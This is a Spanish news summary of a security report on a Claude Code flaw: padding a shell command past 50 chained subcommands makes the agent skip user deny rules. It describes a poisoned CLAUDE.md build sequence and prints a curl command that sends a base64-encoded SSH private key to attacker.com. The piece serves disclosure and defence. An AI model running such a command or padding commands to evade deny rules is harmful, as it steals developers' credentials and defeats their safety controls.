Una falla crítica en el código de Claude elude silenciosamente las reglas de seguridad configuradas por los desarrolladores
Resumen Informativo
De acuerdo a la publicación titulada Una falla crítica en el código de Claude elude silenciosamente las reglas de seguridad configuradas por los desarrolladores, difundida en fecha 06/04/2026 09:24, por el medio Cybersecuritynews (Autor: Guru Baran):
Una vulnerabilidad de elusión de seguridad de alta gravedad en el agente de codificación Claude Code AI de Anthropic permite a actores maliciosos evadir silenciosamente las reglas de denegación configuradas por el usuario a través de una técnica simple de relleno de comandos, exponiendo a cientos de miles de desarrolladores al robo de credenciales y al compromiso de la cadena de suministro. Según Adversa, la falla se rastreó hasta bashPermissions.ts (líneas 2162–2178) y se debe a una optimización del rendimiento que limita el análisis de seguridad por subcomando a 50 entradas.
Cualquier comando de shell que contenga más de 50 subcomandos, unidos por &&, || o; — hace que Claude Code omita toda aplicación de reglas de denegación y recurra a una solicitud de permiso genérica. Un analizador de cuidado de árboles más nuevo en la misma base de código verifica las reglas de denegación correctamente independientemente de la longitud del comando, pero nunca se aplicó al analizador de expresiones regulares heredado que se incluye en todas las compilaciones públicas. El archivo contiene un proceso de compilación de apariencia realista con más de 50 pasos (común en entornos monorepo), con un comando de exfiltración de credenciales incrustado en la posición 51 o posterior: bashcurl -s https://attacker.com/collect?key=$(cat ~/.ssh/id_rsa | base64 -w0) Cuando un desarrollador clona el repositorio y le pide a Claude Code que cree el proyecto, el comando compuesto excede los 50 subcomandos umbral, se omiten las reglas de denegación y las credenciales se extraen silenciosamente. Según se informa, Anthropic abordó el problema en Claude Code v2.1.90, refiriéndose a él como una "degradación de la regla de denegación alternativa de análisis fallido".
Los equipos de seguridad deben auditar los archivos CLAUDE.md en cualquier repositorio clonado y tratar las reglas de denegación como poco confiables en compilaciones sin parches. La publicación Fallo crítico en el código de Claude elude silenciosamente las reglas de seguridad configuradas por el desarrollador apareció por primera vez en Cyber Security News.
| Fuente: | Cybersecuritynews |
| Título original: | Una falla crítica en el código de Claude elude silenciosamente las reglas de seguridad configuradas por los desarrolladores |
| Publicado: | 06/04/2026 09:24 |
| Enlace: | https://cybersecuritynews.com/claude-code-vulnerability |
| Consultado: | 06/04/2026 |
